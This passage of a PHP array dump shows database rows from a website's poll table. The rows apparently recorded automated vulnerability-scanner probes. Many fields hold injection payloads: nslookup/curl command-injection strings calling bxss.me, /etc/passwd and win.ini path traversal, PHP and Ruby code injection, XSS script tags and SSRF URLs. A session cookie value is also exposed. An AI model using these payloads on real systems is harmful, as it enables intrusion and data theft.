'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201<esi:include src="http://bxss.me/rpb.png"/>',
'sondage_id' => '2'
),
(int) 3499 => array(
'id' => '4042',
'ip' => '45.11.82.145',
'ip1' => 'response.write(9798665*9907473)',
'sondage_id' => '2'
),
(int) 3500 => array(
'id' => '4043',
'ip' => '45.11.82.145',
'ip1' => '${9999462+9999904}',
'sondage_id' => '2'
),
(int) 3501 => array(
'id' => '4044',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3502 => array(
'id' => '4045',
'ip' => '45.11.82.145',
'ip1' => ''+response.write(9798665*9907473)+'',
'sondage_id' => '2'
),
(int) 3503 => array(
'id' => '4046',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3504 => array(
'id' => '4047',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3505 => array(
'id' => '4048',
'ip' => '45.11.82.145',
'ip1' => '"+response.write(9798665*9907473)+"',
'sondage_id' => '2'
),
(int) 3506 => array(
'id' => '4049',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3507 => array(
'id' => '4050',
'ip' => '45.11.82.145',
'ip1' => '',
'sondage_id' => '2'
),
(int) 3508 => array(
'id' => '4051',
'ip' => 'file:///etc/passwd',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3509 => array(
'id' => '4052',
'ip' => '45.11.82.145',
'ip1' => 'Mkp4Y0s1WVhyQ1UyUjkzWGNHS1BjZ0cwQVZBUXJLMlJ5Y2ZRT0ZUTQ==',
'sondage_id' => '2'
),
(int) 3510 => array(
'id' => '4053',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3511 => array(
'id' => '4054',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3512 => array(
'id' => '4055',
'ip' => '../45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3513 => array(
'id' => '4056',
'ip' => '45.11.82.145',
'ip1' => '../../../../../../../../../../../../../../etc/passwd',
'sondage_id' => '2'
),
(int) 3514 => array(
'id' => '4057',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201&n908221=v961213',
'sondage_id' => '2'
),
(int) 3515 => array(
'id' => '4058',
'ip' => '45.11.82.145',
'ip1' => '../../../../../../../../../../../../../../windows/win.ini',
'sondage_id' => '2'
),
(int) 3516 => array(
'id' => '4059',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3517 => array(
'id' => '4060',
'ip' => ')',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3518 => array(
'id' => '4061',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3519 => array(
'id' => '4062',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3520 => array(
'id' => '4063',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3521 => array(
'id' => '4064',
'ip' => '45.11.82.145',
'ip1' => 'file:///etc/passwd',
'sondage_id' => '2'
),
(int) 3522 => array(
'id' => '4065',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3523 => array(
'id' => '4066',
'ip' => '!(()&&!|*|*|',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3524 => array(
'id' => '4067',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3525 => array(
'id' => '4068',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3526 => array(
'id' => '4069',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3527 => array(
'id' => '4070',
'ip' => '^(#$!@#$)(()))******',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3528 => array(
'id' => '4071',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3529 => array(
'id' => '4072',
'ip' => '45.11.82.145',
'ip1' => '../CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3530 => array(
'id' => '4073',
'ip' => '45.11.82.145',
'ip1' => ')',
'sondage_id' => '2'
),
(int) 3531 => array(
'id' => '4074',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3532 => array(
'id' => '4075',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3533 => array(
'id' => '4076',
'ip' => '45.11.82.145',
'ip1' => '!(()&&!|*|*|',
'sondage_id' => '2'
),
(int) 3534 => array(
'id' => '4077',
'ip' => '45.11.82.145',
'ip1' => '^(#$!@#$)(()))******',
'sondage_id' => '2'
),
(int) 3535 => array(
'id' => '4078',
'ip' => 'https://scimat.dz/',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3536 => array(
'id' => '4079',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3537 => array(
'id' => '4080',
'ip' => 'https://scimat.dz/',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3538 => array(
'id' => '4081',
'ip' => '/etc/shells',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3539 => array(
'id' => '4082',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3540 => array(
'id' => '4083',
'ip' => 'https://bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3541 => array(
'id' => '4084',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3542 => array(
'id' => '4085',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3543 => array(
'id' => '4086',
'ip' => 'https://bxss.me/',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3544 => array(
'id' => '4087',
'ip' => 'c:/windows/win.ini',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3545 => array(
'id' => '4088',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3546 => array(
'id' => '4089',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3547 => array(
'id' => '4090',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3548 => array(
'id' => '4091',
'ip' => '45.11.82.145',
'ip1' => ''.gethostbyname(lc('hitkw'.'jkxqihdi490be.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(77).chr(102).chr(71).'',
'sondage_id' => '2'
),
(int) 3549 => array(
'id' => '4092',
'ip' => 'https://bxss.me/\',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3550 => array(
'id' => '4093',
'ip' => 'bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3551 => array(
'id' => '4094',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3552 => array(
'id' => '4095',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3553 => array(
'id' => '4096',
'ip' => '45.11.82.145',
'ip1' => '".gethostbyname(lc("hitdg"."nssemlml8550d.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(74).chr(105).chr(81)."',
'sondage_id' => '2'
),
(int) 3554 => array(
'id' => '4097',
'ip' => '45.11.82.145',
'ip1' => 'http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg',
'sondage_id' => '2'
),
(int) 3555 => array(
'id' => '4098',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3556 => array(
'id' => '4099',
'ip' => ''"()',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3557 => array(
'id' => '4100',
'ip' => '45.11.82.145',
'ip1' => 'gethostbyname(lc('hitvv'.'fuzjbgwve0562.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(79).chr(102).chr(83)',
'sondage_id' => '2'
),
(int) 3558 => array(
'id' => '4101',
'ip' => '45.11.82.145',
'ip1' => 'HttP://bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 3559 => array(
'id' => '4102',
'ip' => '45.11.82.145',
'ip1' => '1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg',
'sondage_id' => '2'
),
(int) 3560 => array(
'id' => '4103',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3561 => array(
'id' => '4104',
'ip' => '45.11.82.145',
'ip1' => 'bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 3562 => array(
'id' => '4105',
'ip' => '45.11.82.145',
'ip1' => 'Http://bxss.me/t/fit.txt',
'sondage_id' => '2'
),
(int) 3563 => array(
'id' => '4106',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3564 => array(
'id' => '4107',
'ip' => '45.11.82.145',
'ip1' => 'http://bxss.me/t/fit.txt%3F.jpg',
'sondage_id' => '2'
),
(int) 3565 => array(
'id' => '4108',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3566 => array(
'id' => '4109',
'ip' => '45.11.82.145',
'ip1' => 'echo ulcbfi$()\ hkcovw\nz^xyu||a #' &echo ulcbfi$()\ hkcovw\nz^xyu||a #|" &echo ulcbfi$()\ hkcovw\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 3567 => array(
'id' => '4110',
'ip' => '45.11.82.145',
'ip1' => '/etc/shells',
'sondage_id' => '2'
),
(int) 3568 => array(
'id' => '4111',
'ip' => '45.11.82.145',
'ip1' => '&echo zyemoj$()\ hwnayr\nz^xyu||a #' &echo zyemoj$()\ hwnayr\nz^xyu||a #|" &echo zyemoj$()\ hwnayr\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 3569 => array(
'id' => '4112',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3570 => array(
'id' => '4113',
'ip' => '45.11.82.145',
'ip1' => '../../../../../../../../../../../../../../etc/shells',
'sondage_id' => '2'
),
(int) 3571 => array(
'id' => '4114',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201&echo vkeyhl$()\ gahniq\nz^xyu||a #' &echo vkeyhl$()\ gahniq\nz^xyu||a #|" &echo vkeyhl$()\ gahniq\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 3572 => array(
'id' => '4115',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3573 => array(
'id' => '4116',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3574 => array(
'id' => '4117',
'ip' => '45.11.82.145',
'ip1' => 'c:/windows/win.ini',
'sondage_id' => '2'
),
(int) 3575 => array(
'id' => '4118',
'ip' => '45.11.82.145',
'ip1' => ')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))',
'sondage_id' => '2'
),
(int) 3576 => array(
'id' => '4119',
'ip' => '45.11.82.145',
'ip1' => ';assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));',
'sondage_id' => '2'
),
(int) 3577 => array(
'id' => '4120',
'ip' => '45.11.82.145',
'ip1' => '|echo txkocr$()\ gtbopm\nz^xyu||a #' |echo txkocr$()\ gtbopm\nz^xyu||a #|" |echo txkocr$()\ gtbopm\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 3578 => array(
'id' => '4121',
'ip' => '45.11.82.145',
'ip1' => 'bxss.me',
'sondage_id' => '2'
),
(int) 3579 => array(
'id' => '4122',
'ip' => '45.11.82.145',
'ip1' => '"+"A".concat(70-3).concat(22*4).concat(106).concat(81).concat(103).concat(67)+(require"socket"
Socket.gethostbyname("hitgq"+"nggpftlpb9ddc.bxss.me.")[3].to_s)+"',
'sondage_id' => '2'
),
(int) 3580 => array(
'id' => '4123',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3581 => array(
'id' => '4124',
'ip' => '45.11.82.145',
'ip1' => '';print(md5(31337));$a='',
'sondage_id' => '2'
),
(int) 3582 => array(
'id' => '4125',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3583 => array(
'id' => '4126',
'ip' => '45.11.82.145',
'ip1' => ''+'A'.concat(70-3).concat(22*4).concat(105).concat(84).concat(111).concat(78)+(require'socket'
Socket.gethostbyname('hitlf'+'mlpgwnhe5efc2.bxss.me.')[3].to_s)+'',
'sondage_id' => '2'
),
(int) 3584 => array(
'id' => '4127',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3585 => array(
'id' => '4128',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201|echo tlakph$()\ hmsrec\nz^xyu||a #' |echo tlakph$()\ hmsrec\nz^xyu||a #|" |echo tlakph$()\ hmsrec\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 3586 => array(
'id' => '4129',
'ip' => '45.11.82.145',
'ip1' => ''A'.concat(70-3).concat(22*4).concat(104).concat(82).concat(99).concat(82)+(require'socket'
Socket.gethostbyname('hitlx'+'ewmbhxcucd747.bxss.me.')[3].to_s)',
'sondage_id' => '2'
),
(int) 3587 => array(
'id' => '4130',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3588 => array(
'id' => '4131',
'ip' => '45.11.82.145',
'ip1' => '(nslookup -q=cname hithognybjgbvb5ad3.bxss.me||curl hithognybjgbvb5ad3.bxss.me))',
'sondage_id' => '2'
),
(int) 3589 => array(
'id' => '4132',
'ip' => '45.11.82.145',
'ip1' => '$(nslookup -q=cname hitlfdpbmvmls4f005.bxss.me||curl hitlfdpbmvmls4f005.bxss.me)',
'sondage_id' => '2'
),
(int) 3590 => array(
'id' => '4133',
'ip' => '45.11.82.145',
'ip1' => '";print(md5(31337));$a="',
'sondage_id' => '2'
),
(int) 3591 => array(
'id' => '4134',
'ip' => '45.11.82.145',
'ip1' => ''"()',
'sondage_id' => '2'
),
(int) 3592 => array(
'id' => '4135',
'ip' => '45.11.82.145',
'ip1' => '&nslookup -q=cname hitbmgqojrluy49010.bxss.me&'\"`0&nslookup -q=cname hitbmgqojrluy49010.bxss.me&`'',
'sondage_id' => '2'
),
(int) 3593 => array(
'id' => '4136',
'ip' => '45.11.82.145',
'ip1' => '${@print(md5(31337))}',
'sondage_id' => '2'
),
(int) 3594 => array(
'id' => '4137',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201'&&sleep(27*1000)*pfokve&&'',
'sondage_id' => '2'
),
(int) 3595 => array(
'id' => '4138',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3596 => array(
'id' => '4139',
'ip' => '45.11.82.145',
'ip1' => '${@print(md5(31337))}\',
'sondage_id' => '2'
),
(int) 3597 => array(
'id' => '4140',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3598 => array(
'id' => '4141',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201"&&sleep(27*1000)*wbcuwf&&"',
'sondage_id' => '2'
),
(int) 3599 => array(
'id' => '4142',
'ip' => '45.11.82.145',
'ip1' => ''.print(md5(31337)).'',
'sondage_id' => '2'
),
(int) 3600 => array(
'id' => '4143',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201'||sleep(27*1000)*wghgsy||'',
'sondage_id' => '2'
),
(int) 3601 => array(
'id' => '4144',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3602 => array(
'id' => '4145',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201"||sleep(27*1000)*jggeqa||"',
'sondage_id' => '2'
),
(int) 3603 => array(
'id' => '4146',
'ip' => '45.11.82.1459873041',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3604 => array(
'id' => '4147',
'ip' => 'xfs.bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3605 => array(
'id' => '4148',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3606 => array(
'id' => '4149',
'ip' => '45.11.82.145',
'ip1' => 'xfs.bxss.me',
'sondage_id' => '2'
),
(int) 3607 => array(
'id' => '4150',
'ip' => ''"',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3608 => array(
'id' => '4151',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3609 => array(
'id' => '4152',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201'"()&%<zzz><ScRiPt >QqZG(9340)</ScRiPt>',
'sondage_id' => '2'
),
(int) 3610 => array(
'id' => '4153',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3611 => array(
'id' => '4154',
'ip' => '<!--',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3612 => array(
'id' => '4155',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3613 => array(
'id' => '4156',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3614 => array(
'id' => '4157',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3615 => array(
'id' => '4158',
'ip' => '45.11.82.145',
'ip1' => ''"',
'sondage_id' => '2'
),
(int) 3616 => array(
'id' => '4159',
'ip' => '45.11.82.145',
'ip1' => ''"()&%<zzz><ScRiPt >QqZG(9898)</ScRiPt>',
'sondage_id' => '2'
),
(int) 3617 => array(
'id' => '4160',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3618 => array(
'id' => '4161',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3619 => array(
'id' => '4162',
'ip' => '45.11.82.145',
'ip1' => '<!--',
'sondage_id' => '2'
),
(int) 3620 => array(
'id' => '4163',
'ip' => '45.11.82.145',
'ip1' => '&(nslookup -q=cname hitkipzuxvkwua9e20.bxss.me||curl hitkipzuxvkwua9e20.bxss.me)&'\"`0&(nslookup -q=cname hitkipzuxvkwua9e20.bxss.me||curl hitkipzuxvkwua9e20.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 3621 => array(
'id' => '4164',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3622 => array(
'id' => '4165',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac2019352698',
'sondage_id' => '2'
),
(int) 3623 => array(
'id' => '4166',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3624 => array(
'id' => '4167',
'ip' => '45.11.82.145',
'ip1' => '|(nslookup -q=cname hitsjmszrvgvg6c863.bxss.me||curl hitsjmszrvgvg6c863.bxss.me)',
'sondage_id' => '2'
),
(int) 3625 => array(
'id' => '4168',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3626 => array(
'id' => '4169',
'ip' => '45.11.82.145',
'ip1' => '`(nslookup -q=cname hitnnqbeweocef0893.bxss.me||curl hitnnqbeweocef0893.bxss.me)`',
'sondage_id' => '2'
),
(int) 3627 => array(
'id' => '4170',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3628 => array(
'id' => '4171',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3629 => array(
'id' => '4172',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3630 => array(
'id' => '4173',
'ip' => '45.11.82.145',
'ip1' => ';(nslookup -q=cname hitwwqnzqufot4fb57.bxss.me||curl hitwwqnzqufot4fb57.bxss.me)|(nslookup -q=cname hitwwqnzqufot4fb57.bxss.me||curl hitwwqnzqufot4fb57.bxss.me)&(nslookup -q=cname hitwwqnzqufot4fb57.bxss.me||curl hitwwqnzqufot4fb57.bxss.me)',
'sondage_id' => '2'
),
(int) 3631 => array(
'id' => '4174',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3632 => array(
'id' => '4175',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3633 => array(
'id' => '4176',
'ip' => 'bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3634 => array(
'id' => '4177',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3635 => array(
'id' => '4178',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3636 => array(
'id' => '4179',
'ip' => '45.11.82.145',
'ip1' => '|(nslookup${IFS}-q${IFS}cname${IFS}hitzvfufigmmw7db86.bxss.me||curl${IFS}hitzvfufigmmw7db86.bxss.me)',
'sondage_id' => '2'
),
(int) 3637 => array(
'id' => '4180',
'ip' => 'scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3638 => array(
'id' => '4181',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3639 => array(
'id' => '4182',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3640 => array(
'id' => '4183',
'ip' => 'scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3641 => array(
'id' => '4184',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3642 => array(
'id' => '4185',
'ip' => '45.11.82.145',
'ip1' => '&(nslookup${IFS}-q${IFS}cname${IFS}hitqhzkcvyhrv96cb5.bxss.me||curl${IFS}hitqhzkcvyhrv96cb5.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitqhzkcvyhrv96cb5.bxss.me||curl${IFS}hitqhzkcvyhrv96cb5.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 3643 => array(
'id' => '4186',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3644 => array(
'id' => '4187',
'ip' => 'scimat.dz:80@bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3645 => array(
'id' => '4188',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3646 => array(
'id' => '4189',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3647 => array(
'id' => '4190',
'ip' => 'bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3648 => array(
'id' => '4191',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3649 => array(
'id' => '4192',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3650 => array(
'id' => '4193',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3651 => array(
'id' => '4194',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3652 => array(
'id' => '4195',
'ip' => 'bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3653 => array(
'id' => '4196',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3654 => array(
'id' => '4197',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3655 => array(
'id' => '4198',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3656 => array(
'id' => '4199',
'ip' => '45.11.82.145'"',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3657 => array(
'id' => '4200',
'ip' => 'bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3658 => array(
'id' => '4201',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3659 => array(
'id' => '4202',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3660 => array(
'id' => '4203',
'ip' => '@@ecojF',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3661 => array(
'id' => '4204',
'ip' => '//bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3662 => array(
'id' => '4205',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3663 => array(
'id' => '4206',
